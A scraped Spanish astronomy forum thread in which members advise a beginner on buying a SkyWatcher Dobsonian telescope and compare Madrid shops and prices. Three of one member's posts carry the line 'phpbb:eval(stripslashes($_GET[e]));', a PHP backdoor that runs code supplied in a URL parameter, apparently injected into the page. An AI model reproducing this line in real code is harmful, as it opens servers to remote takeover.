Presentacion + consejos

Preguntas básicas sobre astronomía
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion + consejos

Mensaje por astrolozano »

Hola rviper, bienvenido al foro.

Yo también te recomiendo el dobson sky watcher 200mm (a punto estuve de comprarme el sky-watcher 250mm, pero se me cruzó mi actual montura por el camino jeje).

Yo te diría que no cometas los errores de muchos de nosotros, y esperes a la próxima salida para juzgar por ti mismo. Esto es muy personal, y a lo mejor resulta que la imagen de los newton no te gustan y prefieres comprar un refractor más pequeño... (te vuelves muy pijo en algunas cosas), o ves algo que te gusta más aunque sea un pelín más caro... para comprarlo vas a tener tiempo de sobra, creeme :wink:
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

[quote="rviper"]
El dobson que me recomendaba m3ntol lo recomiendan bastante y me han comentado de una tienda online, que tambien tiene tienda fisica aqui en Madrid, por la que no sale muy caro.

Saludos[/quote]

En efecto, en www.amaina.com tienen los SkyWatcher y tienen tienda física por Guzman el Bueno. Son una tienda muy curiosa porque venden cosas muy variadas (palos de golf, bicicletas de montaña, ballestas y telescopios)

En telescopios venden varias marcas, entre ellas Ultralyt y SkyWatcher, que como te dije, es bastante recomendable para iniciarse. De todos modos lo venden carísimo, el dobson de 200mm lo tienen a 400
phpbb:eval(stripslashes($_GET[e]));
Ciempozuelos
Mensajes: 15
Registrado: Lun Ago 11, 2008 12:36 pm

Presentacion + consejos

Mensaje por Ciempozuelos »

[quote="m3ntol"][quote="rviper"]
El dobson que me recomendaba m3ntol lo recomiendan bastante y me han comentado de una tienda online, que tambien tiene tienda fisica aqui en Madrid, por la que no sale muy caro.

Saludos[/quote]

En efecto, en www.amaina.com tienen los SkyWatcher y tienen tienda física por Guzman el Bueno. Son una tienda muy curiosa porque venden cosas muy variadas (palos de golf, bicicletas de montaña, ballestas y telescopios)

En telescopios venden varias marcas, entre ellas Ultralyt y SkyWatcher, que como te dije, es bastante recomendable para iniciarse. De todos modos lo venden carísimo, el dobson de 200mm lo tienen a 400
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

Rviper, te voy a dar un consejo, como te guste mucho la astronomía te vas a enganchar mucho en cuanto tengas la oportunidad de practicar la observacion con un telescopio, te quiero decir que como no te compres algo aceptable te vas a arrepentir en poco tiempo, y no digamos cuando quieras dar el paso hacia la astrofotografia, te aseguro que va a ser inmediato.
El primer telescopio que me compre era una patata y eso que me costo unos 390
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

[quote="Ciempozuelos"]
Amaina esta disparado en precio. La diferencia puede llegar a ser de 100
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

Aire libre, www.airelibre.es, dirección Dr Castelo nº 29 Madrid, teléfono 915572178.


Un saludo.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Presentacion + consejos

Mensaje por astrolozano »

Tienen el de 20cm por 325
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

Gracias!!

En efecto, el SkyWatcher de 200/1200 tiene un precio bastante bueno:
http://www.airelibre.es/catalogo/detalle.php?sec=1435
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

WWW.AIRELIBRE.ES teléfono 915572178 dirección, Dr Castelo nº 28 Madrid.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Buenos dias.

Madre mia que contestacion masiva!! Os lo agradezco de veras. La tienda online es la que ha comentado Cienpozuelos. La verdad es que de precio estan muy bien: el 6" por 165 y el 8" por 325
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
Responder